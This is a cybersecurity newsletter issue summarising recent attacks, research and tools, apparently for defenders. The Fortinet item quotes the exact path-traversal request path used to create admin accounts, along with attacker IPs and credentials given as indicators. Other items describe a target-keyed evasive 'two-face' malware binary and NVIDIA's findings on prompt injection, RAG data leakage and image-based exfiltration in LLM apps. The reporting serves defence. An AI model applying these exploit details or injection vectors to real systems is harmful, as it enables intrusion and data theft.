Attacks & Vulnerabilities |
Over 67,000 Fake npm Packages Flood Registry in Worm-Like Spam Attack (5 minute read)
Cybersecurity researchers uncovered a massive spam campaign flooding npm with over 67,000 fake packages dubbed "IndonesianFoods." The worm-like attack, active since early 2024, exploits dormant JavaScript files requiring manual execution to bypass security scanners. Attackers likely monetize the campaign through the Tea protocol by artificially inflating impact scores to earn cryptocurrency tokens, while creating a self-replicating network that strains registry infrastructure and pollutes search results. |
Cl0p Ransomware Lists NHS UK as Victim, Days After Washington Post Breach (3 minute read)
The Cl0p ransomware group claimed the NHS UK as a victim on November 11, days after breaching The Washington Post by exploiting CVE-2025-61882, a critical remote code execution vulnerability (CVSS 9.8) in Oracle E-Business Suite versions 12.2.3-12.2.14. The vulnerability was exploited beginning August 2025 before Oracle's October 4 emergency patch, with attacks accelerating after Scattered Lapsus$ Hunters leaked proof-of-concept code on October 3, enabling Cl0p and FIN11 to conduct synchronized data-exfiltration campaigns against hundreds of organizations. Organizations running Oracle EBS must immediately apply the October 2025 patch, conduct forensic reviews dating back to August, and monitor for connections to suspicious IP addresses 200.107.207.26 and 185.181.60.11. |
Suspected Fortinet Zero Day Exploited in the Wild (2 minute read)
A suspected zero-day path traversal vulnerability in Fortinet firewall devices is actively being exploited to create admin-level user accounts through HTTP POST requests to /api/v2.0/cmdb/system/admin%3F/../../../../../cgi-bin/fwbcgi. Attackers are deploying payloads from 15 source IP addresses, including 107.152.41.19 and 185.192.70.x ranges and 64.95.13.8, using specific username/password pairs like "Testpoint/AFT3$tH4ck" and "trader1/3eMIXX43". Organizations with exposed Fortinet management interfaces should promptly investigate for unauthorized admin accounts, monitor for connections to these IPs, and look for suspicious POST requests to the endpoint while awaiting vendor patches. |
|
Creating a "Two-Face" Rust Binary on Linux (8 minute read)
A "two-face" binary is a binary that contains a malicious program designed to run on a target host and a benign binary that executes on any other host. To ensure that the malicious program runs only on the target host, it is encrypted with a key derived from the target's disk partition UUIDs. The author of this article developed a twoface Rust binary to implement this process, which also includes defenses to prevent detection of the decrypted binary. |
Configuring the AWS WAF Anti-DDOS Managed Rule Group For Your Resources and Clients (7 minute read)
AWS WAF provides an Anti-DDOS managed rule group to detect and mitigate HTTP DDOS events. By default, the rule group uses a JavaScript challenge for all GET requests with low or medium suspicion and blocks all GET requests with high suspicion of contributing to DDoS attacks. This post provides ways to customize the rule group for scenarios where clients don't support the JavaScript challenge, clients can't use the WAF client integration, non-challengeable requests overwhelm resources, and when challengeable requests overwhelm resources before they're blocked. |
Practical LLM Security Advice from the NVIDIA AI Red Team (6 minute read)
The NVIDIA AI Red Team has observed three common vulnerabilities in the implementation of AI systems. The first vulnerability involves directly executing LLM-generated code, which could lead to remote code execution in the case of direct or indirect prompt injection. The second vulnerability is related to insufficient access controls in RAG data sources, which could allow a user to read data they are not privileged to read or write data to the data store. The third vulnerability is related to active content rendering of LLM outputs, which could lead to information leakage via images or other network requests. |
|
Win11Debloat (GitHub Repo)
Win11Debloat is a PowerShell script that removes preinstalled apps, disables telemetry, and performs various other changes to customize, declutter, and improve the Windows 11 user experience. |
Sweet Security (Product Launch)
Sweet Security offers AI-powered security solutions for real-time threat detection and response across cloud and AI environments. The platform uncovers shadow AI, misconfigurations, risky access, and prevents prompt injection and abnormal model behavior. |
Shannon (GitHub Repo)
Shannon is an AI pentester whose goal is to break your web app before someone else does. It autonomously hunts for attack vectors in your code, then uses its built-in browser to execute real exploits, such as injection attacks and auth bypass, to prove the vulnerability is actually exploitable. |
|
Mozilla Firefox Gets New Anti-Fingerprinting Defenses (2 minute read)
Mozilla has announced that, beginning in the recently released Firefox 145, further fingerprinting blocking will be implemented, dropping the percentage of user trackability to 20%. The specific enhancements block requests to discover installed fonts, hardware details, number of processor cores, multi-touch support, and dock/taskbar dimensions. The enhancements will initially be rolled out for users in Private Browsing who set their Enhanced Tracking Protection to Strict. |
NHS supplier ends probe into ransomware attack that contributed to patient death (2 minute read)
Synnovis has completed an exhaustive 18-month investigation into a crippling ransomware attack in June 2024 that affected nearly a million NHS patients, severely disrupted London pathology services and leading to a patient's death. The probe struggled with fragmented data. While no ransom was paid and systems were replaced, many patients must still wait for official notification if their data was compromised. |
Google Sues to Disrupt Chinese SMS Phishing Triad (2 minute read)
Google filed a lawsuit in the Southern District of New York against 25 individuals connected to Lighthouse, a Chinese phishing-as-a-service toolkit that has compromised over 1 million victims across 120 countries by spoofing USPS, toll road operators, e-commerce sites, and financial institutions via SMS. The operation captures payment card data through fake mobile sites and then exploits the legitimate Apple Pay and Google Pay enrollment processes by tricking victims into providing one-time authentication codes, enabling attackers to load stolen cards onto mobile wallets they control. Security teams should monitor SMS gateways for brand impersonation, educate users to verify unexpected payment requests through official channels, and watch for unusual mobile wallet enrollment patterns that could indicate credential theft. |
|
| Love TLDR? Tell your friends and get rewards! | | Share your referral link below with friends to get free TLDR swag! | | | |
| Track your referrals here. |
| Want to advertise in TLDR? 📰 If your company is interested in reaching an audience of cybersecurity professionals and decision makers, you may want to advertise with us.
Want to work at TLDR? 💼 Apply here or send a friend's resume to jobs@tldr.tech and get $1k if we hire them!
If you have any comments or feedback, just respond to this email! Thanks for reading, Prasanna Gautam, Eric Fernandez & Sammy Tbeile
|
|
| |
0 Comments